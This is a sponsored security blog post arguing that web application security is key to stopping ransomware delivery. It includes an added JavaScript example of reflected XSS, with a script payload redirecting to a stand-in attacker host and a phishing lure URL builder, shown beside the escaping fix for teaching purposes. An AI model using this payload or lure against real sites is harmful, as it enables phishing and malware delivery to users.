5 Reasons MSSP Clients Need Strong AppSec Strategies to Thwart Ransomware

Web vulnerabilities are a key link in many ransomware attack chains and a source of major
problems for organizations worldwide. Even so, many businesses have decided to pour their
efforts into defending against ransomware specifically, even if that means shifting budget away
from web application security (AppSec) to free up money. Tempting as the idea seems, it leaves
IT systems less secure against ransomware rather than future-proofing assets, systems, and
processes.

Read on for five key reasons why MSSP clients need to take care of web security if they want to
avoid ransomware today and in the future.

1: Ransomware Isn't the Attack Itself but the Consequence of an Attack

Ransomware is a payload delivered by a successful cyberattack; it is not the attack itself, and
confusing the two is dangerous. Think of it as the bacterium or virus that makes you sick: the
pathogen has to get in first, and once inside it can multiply and spread through the whole body,
sometimes with fatal results. The same goes for ransomware: once it is running inside your
systems and spreading, it may already be too late.

Fortunately, a pathogen cannot appear in a host spontaneously, and neither can ransomware: it
has to be introduced into the environment somehow. Prevention is better than cure, so the most
effective defensive measures MSSP clients can take are those that keep ransomware from
entering their systems in the first place.

Just as with pathogens, ransomware has several routes in. You might catch an airborne virus by
inhaling it after someone coughs or sneezes, or by touching someone who is already infected.
Ransomware, similarly, is delivered through phishing and social engineering or through direct
exploitation of system vulnerabilities. Because a large share of remote exploitation targets web
applications and other internet-facing web services, that is where MSSP clients need to place
their first line of defense. The surest way to protect against ransomware is to prevent the
attacks used to deliver it, because once the payload is in and spreading, it is often too late.

2: Web-Based Attacks are Where Ransomware Grows and Thrives

Social engineering and phishing are often considered the most common ways for attackers to
deliver ransomware to unsuspecting victims. But how successful a phishing attempt is often
depends on common web vulnerabilities such as cross-site scripting (XSS), which make the lure
more convincing by abusing the trust users place in a legitimate domain.

For example, say an organization's web application has a reflected XSS vulnerability. An
attacker crafts a link to the vulnerable page with a script payload in a URL parameter and
sends it to employees in phishing messages. Because the link really does point to the
organization's own domain, it looks trustworthy. If one of the organization's authenticated
employees falls for the scam and clicks the link, the vulnerable page reflects the payload into
its response, the script runs in the employee's browser, and the browser is redirected
automatically to a malicious site. There, the browser downloads a ransomware installer and the
infection begins. Unfortunately, employees worldwide fall for similar tricks every day.
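The scenario above, as an added worked example that is not part of the original article or Invicti's own code: a minimal search-page renderer with a reflected XSS flaw beside its hardened form, plus the lure URL an attacker would mail out. The application hostname, handler names, and the attacker's redirect target are hypothetical placeholders.

```javascript
// Added example (not from the original article): a reflected XSS flaw used as a
// phishing redirect, and the output-encoding fix. All hostnames are hypothetical.

// Vulnerable: the user-supplied search term is concatenated straight into HTML.
function vulnerableSearchPage(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened: every character HTML could interpret is escaped before insertion.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function hardenedSearchPage(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// The phishing lure: a script that sends the victim's browser to an
// attacker-controlled host. The redirect target is a constructed placeholder.
const PHISHING_PAYLOAD =
  "<script>location.href='https://attacker.example/installer'</script>";

// Build the link the attacker mails out. It points at the organization's own
// (hypothetical) domain, which is exactly what makes it look trustworthy.
function buildLureUrl(payload) {
  return "https://intranet.example.com/search?q=" + encodeURIComponent(payload);
}

// Server-side view: decode the parameter the way a web framework would before
// the request reaches the page handler.
function queryParamFromUrl(url) {
  return new URL(url).searchParams.get("q");
}

// Regression-test style check: does the rendered response still carry an
// executable <script> tag that originated in the request parameter?
function reflectsScript(html) {
  return /<script\b/i.test(html);
}

// Walk the attack end to end against one version of the page.
function simulate(renderPage) {
  const q = queryParamFromUrl(buildLureUrl(PHISHING_PAYLOAD));
  return reflectsScript(renderPage(q));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable page reflects script:", simulate(vulnerableSearchPage)); // true
  console.log("hardened page reflects script:", simulate(hardenedSearchPage));     // false
}
```

Output encoding at the point of insertion is the fix; a Content Security Policy that forbids inline script is a worthwhile second layer, but only the hardened renderer actually removes the vulnerability.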

In worse situations, attackers can use vulnerable web applications to attack business partners,
customers, or the general public, hiding behind the trusted domain while exposing security
weaknesses that do lasting damage to reputation. MSSP clients who want to minimize this risk
need to make sure that no sites or applications operating under their domain names, not just
the main application, have XSS vulnerabilities to exploit.

3: As Businesses Move to the Cloud, So Do Cybercriminals

As noted above, there are several ways for threat actors to deliver ransomware to a targeted
system, and many of them involve vulnerabilities. Not long ago, the most attractive
vulnerabilities were in on-premises systems: network security issues caused by device
misconfigurations, or legacy software that had not been patched in a while. The pandemic
accelerated the move to work-from-home and remote environments, and on-prem networks are
no longer the norm.

What is taking the place of on-prem networks and infrastructure? Cloud services built entirely
on web technologies. Seen through a security lens, this shift means the risk and frequency of
web vulnerabilities deserve more emphasis, not less. Security issues that were once limited to,
say, a marketing website may now affect business-critical systems and data for MSSP clients
making the move to the cloud.

Bad actors are keeping up with these changes. They know that the old approach of releasing an
encryptor to crawl a local network and infect physical devices and servers no longer reaches
everything of value. More and more potential victims use their web browsers as thin clients to
reach data in the cloud, so threat actors are turning toward web and cloud vulnerabilities to get
the job done. By focusing on network security rather than web security, MSSP customers could
be leaving gaping holes for attackers to exploit.

4: Attack Details Are Not Reported by Ransomware Victims

Many organizations that suffer a ransomware attack don't share useful details afterwards, which
makes finding reliable ways to defend against ransomware tricky. Often a public statement is
issued about the attack, but nothing else of substance that could give other organizations a
heads-up.

This behavior is understandable for several reasons. An organization might not be able to get
to the root cause of the weakness and fix it quickly after an attack. Sharing attack-vector details
could invite additional attacks on the business, so some companies shy away. And because
admitting to a breach or ransomware attack reflects poorly on reputation, there is often
hesitation to openly share security mistakes.

Whether justified or not, these practices slow or stall the design of effective protection
methods and harm IT security for MSSP clients across the globe. Refusing to share critical
details of an attack is akin to a country suffering an outbreak of a deadly virus and withholding
the information from the rest of the world for political reasons. Doing the same with
ransomware attacks makes it harder for the entire global community to avoid and prevent them
in the future.

5: Reports From the Media Focus on the Incidents and Not on Solutions

Even in the rare cases where attack details are known, the media typically omit the technical
details, making these information gaps even wider. Coverage tends to focus on the popular
aspects of the story, like business impact and financial damages. For example, finding out that
the 2019 Capital One data breach began with server-side request forgery (SSRF), an attack
that let the intruder pull cloud credentials from the instance metadata service through a
misconfigured web application firewall, took digging through search engines because it was
not reported in any detail.

Since neither media nor business behavior helps lessen the severity of the situation for MSSP
clients and organizations across the globe, we look to enterprises that follow best practices
around incident disclosure. Cloudflare is a good example of an organization that discloses
security incidents in great detail, as it did with its major outage in July 2019, caused by a faulty
regular expression in a newly deployed web application firewall (WAF) rule that exhausted CPU
on its edge servers.

Ideally, the media should share all known technical details of a ransomware attack so that the
global community can recognize the warning signs and protect itself in the future.


Guest blog courtesy of Invicti, an international web app security company headquartered in Austin, Texas. Regularly contributed guest blogs are part of MSSP Alert's sponsorship program.